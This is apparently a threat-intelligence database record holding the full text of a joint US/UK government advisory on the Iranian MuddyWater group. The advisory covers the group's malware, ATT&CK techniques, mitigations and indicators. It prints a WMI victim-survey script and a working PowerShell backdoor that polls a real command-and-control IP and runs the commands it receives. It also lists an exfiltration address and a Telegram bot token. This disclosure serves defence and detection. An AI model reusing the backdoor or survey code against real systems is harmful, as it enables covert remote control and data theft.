{
	"id": "0f4f7e1d-df8f-41f5-b5bd-17e2a603f80b",
	"created_at": "2026-04-06T00:21:32.429196Z",
	"updated_at": "2026-04-10T13:12:02.490525Z",
	"deleted_at": null,
	"sha1_hash": "35d8864336f82a2732edd20ce9e5d9d70bbebc0c",
	"title": "Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 241773,
	"plain_text": "Iranian Government-Sponsored Actors Conduct Cyber Operations\r\nAgainst Global Government and Commercial Networks | CISA\r\nPublished: 2022-02-24 · Archived: 2026-04-05 13:18:28 UTC\r\nSummary\r\nActions to Take Today to Protect Against Malicious Activity\r\n* Search for indicators of compromise.\r\n* Use antivirus software.\r\n* Patch all systems.\r\n* Prioritize patching known exploited vulnerabilities.\r\n* Train users to recognize and report phishing attempts.\r\n* Use multi-factor authentication.\r\nNote: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT\u0026CK®)\r\nframework, version 10. See the ATT\u0026CK for Enterprise for all referenced threat actor tactics and techniques.\r\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S.\r\nCyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre\r\n(NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known\r\nas MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government\r\nand private-sector organizations across sectors—including telecommunications, defense, local government, and oil\r\nand natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala,\r\nMERCURY, Static Kitten, Seedworm, and TEMP.Zagros.\r\nMuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT\r\ngroup has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. 
MuddyWater\r\nactors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other\r\nmalicious cyber actors.\r\nMuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to\r\ngain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on\r\nvictim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into\r\nrunning malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA,\r\nCNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop,\r\nSmall Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their\r\nmalicious activity. \r\nThis advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise\r\n(IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of\r\nmalicious activity against sensitive networks. \r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 1 of 17\n\nFBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the\r\nmitigations in this advisory and review the following resources for additional information. 
Note: also see the\r\nAdditional Resources section.\r\nMalware Analysis Report – MAR-10369127-1.v1: MuddyWater\r\nIOCs – AA22-052A.stix and MAR-10369127-1.v1.stix\r\nCISA's webpage – Iran Cyber Threat Overview and Advisories\r\nNCSC-UK MAR – Small Sieve\r\nCNMF's press release – Iranian intel cyber suite of malware uses open source tools\r\nTechnical Details\r\nFBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group\r\nemploying spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to\r\ngain access to sensitive government and commercial networks.\r\nAs part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files,\r\ncontaining either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that\r\ndrops a malicious file to the victim’s network [T1566.001, T1204.002]. MuddyWater actors also use techniques\r\nsuch as side-loading DLLs [T1574.002] to trick legitimate programs into running malware and obfuscating\r\nPowerShell scripts [T1059.001] to hide C2 functions [T1027] (see the PowGoop section for more information).\r\nAdditionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and\r\nPOWERSTATS—for loading malware, backdoor access, persistence [TA0003], and exfiltration [TA0010]. See\r\nbelow for descriptions of some of these malware sets, including newer tools or variants to the group’s suite.\r\nAdditionally, see Malware Analysis Report MAR-10369127.r1.v1: MuddyWater for further details.\r\nPowGoop\r\nMuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of\r\na DLL loader and a PowerShell-based downloader. 
The malicious file impersonates a legitimate file that is signed as a\r\nGoogle Update executable file.\r\nAccording to samples of PowGoop analyzed by CISA and CNMF, PowGoop consists of three components:\r\n* A DLL file renamed as a legitimate filename, Goopdate.dll, to enable the DLL side-loading technique\r\n[T1574.002]. The DLL file is contained within an executable, GoogleUpdate.exe.\r\n* A PowerShell script, obfuscated as a .dat file, goopdate.dat, used to decrypt and run a second obfuscated\r\nPowerShell script, config.txt [T1059.001].\r\n* config.txt, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.\r\nThese components retrieve encrypted commands from a C2 server. The DLL file hides communications with\r\nMuddyWater C2 servers by executing with the Google Update service.\r\nSmall Sieve\r\nAccording to a sample analyzed by NCSC-UK, Small Sieve is a simple Python [T1059.006] backdoor\r\ndistributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe. The NSIS installs the Python\r\nbackdoor, index.exe, and adds it as a registry run key [T1547.001], enabling persistence [TA0003].\r\nMuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's\r\nWindows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft\r\n(e.g., \"Microsift\") and Outlook in its filenames associated with Small Sieve [T1036.005].\r\nSmall Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and\r\navoid detection [TA0005] by using custom string and traffic obfuscation schemes together with the Telegram Bot\r\napplication programming interface (API). 
Specifically, Small Sieve’s beacons and taskings are performed using\r\nTelegram API over Hypertext Transfer Protocol Secure (HTTPS) [T1071.001], and the tasking and beaconing data\r\nis obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [T1027, T1132.002].\r\nNote: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with\r\nhigh confidence.\r\nSee Appendix B for further analysis of Small Sieve malware.\r\nCanopy\r\nMuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted\r\nattachments [T1566.001]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows\r\nScript File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United\r\nKingdom and the United States attribute these malware samples to MuddyWater with high confidence.\r\nIn the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls, contained macros written in Visual\r\nBasic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they\r\nreceive a prompt to enable macros [T1204.002]. Once this occurs, the macros are executed, decoding and installing\r\nthe two embedded Windows Script Files.\r\nThe first .wsf is installed in the current user startup folder [T1547.001] for persistence. The file contains\r\nhexadecimal (hex)-encoded strings that have been reshuffled [T1027]. The file executes a command to run the\r\nsecond .wsf.\r\nThe second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [TA0035] the victim\r\nsystem’s IP address, computer name, and username [T1005]. 
The collected data is then hex-encoded and sent to an\r\nadversary-controlled IP address, http[:]88.119.170[.]124, via an HTTP POST request [T1041].\r\nMori\r\nMuddyWater also uses the Mori backdoor, which uses Domain Name System (DNS) tunneling to communicate with the group’s\r\nC2 infrastructure [T1572].\r\nAccording to one sample analyzed by CISA, FML.dll, Mori uses a DLL written in C++ that is executed with\r\nregsvr32.exe with export DllRegisterServer; this DLL appears to be a component of another program.\r\nFML.dll contains approximately 200MB of junk data [T1001.001] in a resource directory 205, number 105. Upon\r\nexecution, FML.dll creates a mutex, 0x50504060, and performs the following tasks:\r\n* Deletes the file FILENAME.old and deletes file by registry value. The filename is the DLL file with a .old\r\nextension.\r\n* Resolves networking APIs from strings that are ADD-encrypted with the key 0x05.\r\n* Uses Base64 and JavaScript Object Notation (JSON) based on certain key values passed to the JSON library\r\nfunctions. It appears likely that JSON is used to serialize C2 commands and/or their results.\r\n* Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2\r\n[T1071.001].\r\n* Reads and/or writes data from the following Registry Keys, HKLM\\Software\\NFC\\IPA and\r\nHKLM\\Software\\NFC\\(Default).\r\nPOWERSTATS\r\nThis group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent\r\naccess to the victim systems [T1059.001].\r\nCNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools—along with\r\nJavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and\r\nrepository, VirusTotal. 
Network operators who identify multiple instances of the tools on the same network should\r\ninvestigate further as this may indicate the presence of an Iranian malicious cyber actor.\r\nMuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI,\r\nCISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of\r\nprivilege vulnerability (CVE-2020-1472) and the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). See CISA’s Known Exploited Vulnerabilities Catalog for additional vulnerabilities with known\r\nexploits and joint Cybersecurity Advisory: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft\r\nExchange and Fortinet Vulnerabilities for additional Iranian APT group-specific vulnerability exploits.\r\nSurvey Script\r\nThe following script is an example of a survey script used by MuddyWater to enumerate information about victim\r\ncomputers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the\r\ncompromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). 
The\r\nproduced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.\r\n$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += \";;\";$ips = \"\";Get-WmiObject Win32_NetworkAdapterConfiguration -Filter \"IPEnabled=True\" | % {$ips = $ips + \", \" + $_.IPAddress[0]};$S += $ips.substring(1);$S += \";;\";$S += $O.OSArchitecture;$S += \";;\";$S += [System.Net.DNS]::GetHostByName('').HostName;$S += \";;\";$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += \";;\";$S += $env:UserName;$S += \";;\";$AntiVirusProducts = Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;\r\nNewly Identified PowerShell Backdoor\r\nThe newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to\r\nencrypt communications with the key 0x02 to adversary-controlled infrastructure. 
The script is lightweight in\r\nfunctionality and uses the InvokeScript method to execute responses received from the adversary.\r\nfunction encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=\u003cvictim identifier\u003e');$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res= [string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=\u003cvictim identifier\u003e');$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add('cookie',(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;}\r\nMITRE ATT\u0026CK Techniques\r\nMuddyWater uses the ATT\u0026CK techniques listed in table 1.\r\nTable 1: MuddyWater ATT\u0026CK Techniques [2]\r\nTechnique Title [ID]: Use\r\nReconnaissance\r\nGather Victim Identity Information: Email Addresses [T1589.002]: MuddyWater has specifically targeted government agency employees with spearphishing emails.\r\nResource Development\r\nAcquire Infrastructure: Web Services [T1583.006]: MuddyWater has used file sharing services including OneHub to distribute tools.\r\nObtain Capabilities: Tool [T1588.002]: MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments.\r\nInitial Access
\r\nPhishing: Spearphishing Attachment [T1566.001]: MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments.\r\nPhishing: Spearphishing Link [T1566.002]: MuddyWater has sent targeted spearphishing emails with malicious links.\r\nExecution\r\nWindows Management Instrumentation [T1047]: MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information.\r\nCommand and Scripting Interpreter: PowerShell [T1059.001]: MuddyWater has used PowerShell for execution.\r\nCommand and Scripting Interpreter: Windows Command Shell [T1059.003]: MuddyWater has used a custom tool for creating reverse shells.\r\nCommand and Scripting Interpreter: Visual Basic [T1059.005]: MuddyWater has used Visual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros.\r\nCommand and Scripting Interpreter: Python [T1059.006]: MuddyWater has used tools developed in Python, including Out1. 
\r\nCommand and Scripting Interpreter: JavaScript [T1059.007]: MuddyWater has used JavaScript files to execute its POWERSTATS payload.\r\nExploitation for Client Execution [T1203]: MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.\r\nUser Execution: Malicious Link [T1204.001]: MuddyWater has distributed URLs in phishing emails that link to lure documents.\r\nUser Execution: Malicious File [T1204.002]: MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.\r\nInter-Process Communication: Component Object Model [T1559.001]: MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.\r\nInter-Process Communication: Dynamic Data Exchange [T1559.002]: MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange.\r\nPersistence\r\nScheduled Task/Job: Scheduled Task [T1053.005]: MuddyWater has used scheduled tasks to establish persistence.\r\nOffice Application Startup: Office Template Macros [T1137.001]: MuddyWater has used a Word Template, Normal.dotm, for persistence.\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]: MuddyWater has added Registry Run key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding to establish persistence. 
\r\nPrivilege Escalation\r\nAbuse Elevation Control Mechanism: Bypass User Account Control [T1548.002]: MuddyWater uses various techniques to bypass user account control.\r\nCredentials from Password Stores [T1555]: MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.\r\nCredentials from Web Browsers [T1555.003]: MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.\r\nDefense Evasion\r\nObfuscated Files or Information [T1027]: MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.\r\nSteganography [T1027.003]: MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.\r\nCompile After Delivery [T1027.004]: MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.\r\nMasquerading: Match Legitimate Name or Location [T1036.005]: MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. 
E.g., Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection.\r\nDeobfuscate/Decode Files or Information [T1140]: MuddyWater decoded Base64-encoded PowerShell commands using a VBS file.\r\nSigned Binary Proxy Execution: CMSTP [T1218.003]: MuddyWater has used CMSTP.exe and a malicious .INF file to execute its POWERSTATS payload.\r\nSigned Binary Proxy Execution: Mshta [T1218.005]: MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.\r\nSigned Binary Proxy Execution: Rundll32 [T1218.011]: MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.\r\nExecution Guardrails [T1480]: The Small Sieve payload used by MuddyWater will only execute correctly if the word “Platypus” is passed to it on the command line.\r\nImpair Defenses: Disable or Modify Tools [T1562.001]: MuddyWater can disable the system's local proxy settings.\r\nCredential Access\r\nOS Credential Dumping: LSASS Memory [T1003.001]: MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.\r\nOS Credential Dumping: LSA Secrets [T1003.004]: MuddyWater has performed credential dumping with LaZagne.\r\nOS Credential Dumping: Cached Domain Credentials [T1003.005]: MuddyWater has performed credential dumping with LaZagne.\r\nUnsecured Credentials: Credentials In Files [T1552.001]: MuddyWater has run a tool that steals passwords saved in victim email.\r\nDiscovery\r\nSystem Network Configuration Discovery [T1016]: MuddyWater has used malware to collect the victim’s IP address and domain name.\r\nSystem Owner/User Discovery [T1033]: MuddyWater has used malware that can collect the victim’s 
username.\r\nSystem Network Connections Discovery [T1049]: MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.\r\nProcess Discovery [T1057]: MuddyWater has used malware to obtain a list of running processes on the system.\r\nSystem Information Discovery [T1082]: MuddyWater has used malware that can collect the victim’s OS version and machine name.\r\nFile and Directory Discovery [T1083]: MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords \"Kasper,\" \"Panda,\" or \"ESET.\"\r\nAccount Discovery: Domain Account [T1087.002]: MuddyWater has used cmd.exe net user/domain to enumerate domain users.\r\nSoftware Discovery [T1518]: MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.\r\nSecurity Software Discovery [T1518.001]: MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.\r\nCollection\r\nScreen Capture [T1113]: MuddyWater has used malware that can capture screenshots of the victim’s machine.\r\nArchive Collected Data: Archive via Utility [T1560.001]: MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.\r\nCommand and Control\r\nApplication Layer Protocol: Web Protocols [T1071.001]: MuddyWater has used HTTP for C2 communications. E.g., Small Sieve beacons and tasking are performed using the Telegram API over HTTPS.\r\nProxy: External Proxy [T1090.002]: MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. 
MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to C2.\r\nWeb Service: Bidirectional Communication [T1102.002]: MuddyWater has used web services including OneHub to distribute remote access tools.\r\nMulti-Stage Channels [T1104]: MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.\r\nIngress Tool Transfer [T1105]: MuddyWater has used malware that can upload additional files to the victim’s machine.\r\nData Encoding: Standard Encoding [T1132.001]: MuddyWater has used tools to encode C2 communications including Base64 encoding.\r\nData Encoding: Non-Standard Encoding [T1132.002]: MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic.\r\nRemote Access Software [T1219]: MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.\r\nExfiltration\r\nExfiltration Over C2 Channel [T1041]: MuddyWater has used C2 infrastructure to receive exfiltrated data.\r\nMitigations\r\nProtective Controls and Architecture\r\nDeploy application control software to limit the applications and executable code that can be run by\r\nusers. Email attachments and files downloaded via links in emails often contain executable code.\r\nIdentity and Access Management\r\nUse multifactor authentication where possible, particularly for webmail, virtual private networks, and\r\naccounts that access critical systems.\r\nLimit the use of administrator privileges. 
Users who browse the internet, use email, and execute code with\r\nadministrator privileges make for excellent spearphishing targets because their system—once infected—\r\nenables attackers to move laterally across the network, gain additional accesses, and access highly sensitive\r\ninformation. \r\nPhishing Protection\r\nEnable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via\r\nspearphishing.\r\nBe suspicious of unsolicited contact via email or social media from any individual you do not know\r\npersonally. Do not click on hyperlinks or open attachments in these communications.\r\nConsider adding an email banner to emails received from outside your organization and disabling\r\nhyperlinks in received emails.\r\nTrain users through awareness and simulations to recognize and report phishing and social engineering\r\nattempts. Identify and suspend access of user accounts exhibiting unusual activity.\r\nAdopt threat reputation services at the network device, operating system, application, and email service\r\nlevels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and\r\nIP addresses used in spearphishing attacks. \r\nVulnerability and Configuration Management\r\nInstall updates/patch operating systems, software, and firmware as soon as updates/patches are\r\nreleased. 
Prioritize patching known exploited vulnerabilities.\r\nAdditional Resources\r\nFor more information on Iranian government-sponsored malicious cyber activity, see CISA's webpage – Iran\r\nCyber Threat Overview and Advisories and CNMF's press release – Iranian intel cyber suite of malware uses\r\nopen source tools.\r\nFor information and resources on protecting against and responding to ransomware, refer to\r\nStopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and\r\nalerts.\r\nThe joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom,\r\nand the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides\r\nadditional guidance when hunting or investigating a network and common mistakes to avoid in incident\r\nhandling.\r\nCISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess,\r\nidentify, and reduce their exposure to threats, including ransomware. By requesting these services,\r\norganizations of any size could find ways to reduce their risk and mitigate attack vectors.\r\nThe U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for\r\nreports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for\r\nmore information and how to report information securely.\r\nReferences\r\n[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools\r\n[2] MITRE ATT\u0026CK: MuddyWater\r\nCaveats\r\nThe information you have accessed or received is being provided “as is” for informational purposes only. The FBI,\r\nCISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. 
Any\r\nreference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or\r\notherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or\r\nNSA.\r\nPurpose\r\nThis document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective\r\ncybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and\r\nmitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States’ NSA\r\nagrees with this attribution and the details provided in this report.\r\nAppendix A: IOCs\r\nThe following IP addresses are associated with MuddyWater activity:\r\nAppendix B: Small Sieve\r\nNote: the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.\r\nMetadata\r\nTable 2: Gram.app.exe Metadata\r\nFilename gram_app.exe \r\nDescription NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key \r\nSize 16999598 bytes \r\nMD5 15fa3b32539d7453a9a85958b77d4c95 \r\nSHA-1 11d594f3b3cf8525682f6214acb7b7782056d282 \r\nSHA-256 b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054 \r\nCompile Time 2021-09-25 21:57:46 UTC \r\nTable 3: Index.exe Metadata\r\nFilename  index.exe \r\nDescription The final PyInstaller-bundled Python 3.9 backdoor \r\nSize 17263089 bytes \r\nMD5 
5763530f25ed0ec08fb26a30c04009f1\r\nSHA-1 2a6ddf89a8366a262b56a251b00aafaed5321992\r\nSHA-256 bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2\r\nCompile Time 2021-08-01 04:39:46 UTC\r\nFunctionality\r\nInstallation\r\nSmall Sieve is distributed as a large (16MB) NSIS installer named gram_app.exe, which does not appear to\r\nmasquerade as a legitimate application. Once executed, the backdoor binary index.exe is installed in the user’s\r\nAppData/Roaming directory and is added as a Run key in the registry to enable persistence after reboot.\r\nThe installer then executes the backdoor with the “Platypus” argument [T1480], which is also present in the\r\nregistry persistence key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift.\r\nConfiguration\r\nThe backdoor attempts to restore previously initialized session data from\r\n%LocalAppData%\\MicrosoftWindowsOutlookDataPlus.txt.\r\nIf this file does not exist, then it uses the hardcoded values listed in table 4:\r\nTable 4: Credentials and Session Values\r\nChat ID: 2090761833. This is the Telegram Channel ID that beacons are sent to, and from which tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed. 
\r\nBot ID: random value between 10,000,000 and 90,000,000. This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with /com[Bot ID] in order to be processed by the malware.\r\nTelegram Token: 2003026094:AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY. This is the initial token used to authenticate each message to the Telegram Bot API.\r\nTasking\r\nSmall Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the\r\nhost’s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a\r\nTelegram bot using the python-telegram-bot module.\r\nTwo task formats are supported:\r\n* /start – no argument is passed; this causes the beacon information to be repeated.\r\n* /com[BotID] [command] – for issuing commands passed in the argument.\r\nThe following commands are supported by the second of these formats, as described in table 5:\r\nTable 5: Supported Commands\r\ndelete: This command causes the backdoor to exit; it does not remove persistence.\r\ndownload url\"\"filename: The URL will be fetched and saved to the provided filename using the Python urllib module urlretrieve function.\r\nchange token\"\"newtoken: The backdoor will reconnect to the Telegram Bot API using the provided token newtoken. This updated token will be stored in the encoded MicrosoftWindowsOutlookDataPlus.txt file.\r\ndisconnect: The original connection to Telegram is terminated. It is likely used after a change token command is issued. 
\r\nAny commands other than those detailed in table 5 are executed directly by passing them to cmd.exe /c, and the output is returned as a reply.\r\nDefense Evasion\r\nAnti-Sandbox\r\nFigure 1: Execution Guardrail\r\nThreat actors may be attempting to thwart simple analysis, since the backdoor does not run unless “Platypus” is passed on the command line.\r\nString obfuscation\r\nInternal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included in Appendix B.\r\nCommunications\r\nBeacon Format\r\nBefore listening for tasking using CommandHandler objects from the python-telegram-bot module, a beacon is generated manually using the standard requests library:\r\nFigure 2: Manually Generated Beacon\r\nThe hex host data is encoded using the byte shuffling algorithm described in the “Communications (Traffic obfuscation)” section of this report. The example in figure 2 decodes to:\r\nadmin/WINDOMAIN1 | 10.17.32.18\r\nTraffic obfuscation\r\nAlthough traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and responses using a hex byte shuffling algorithm.
A Python3 implementation is shown in figure 3.\r\nFigure 3: Traffic Encoding Scheme Based on Hex Conversion and Shuffling\r\nDetection\r\nTable 6 outlines indicators of compromise.\r\nTable 6: Indicators of Compromise\r\nType | Description | Values\r\nPath | Telegram session persistence file (obfuscated) | %LocalAppData%\\MicrosoftWindowsOutlookDataPlus.txt\r\nPath | Installation path of the Small Sieve binary | %AppData%\\OutlookMicrosift\\index.exe\r\nRegistry value name | Persistence registry key pointing to index.exe with a “Platypus” argument | HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift\r\nString Recovery Script\r\nFigure 4: String Recovery Script\r\nContact Information\r\nTo report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field-offices, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov. For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at Cybersecurity_Requests@nsa.gov.
United Kingdom organizations should report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or for urgent assistance call 03000 200 973.\r\nRevisions\r\nFebruary 24, 2022: Initial Version\r\nSource: https://www.cisa.gov/uscert/ncas/alerts/aa22-055a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cisa.gov/uscert/ncas/alerts/aa22-055a"
	],
	"report_names": [
		"aa22-055a"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
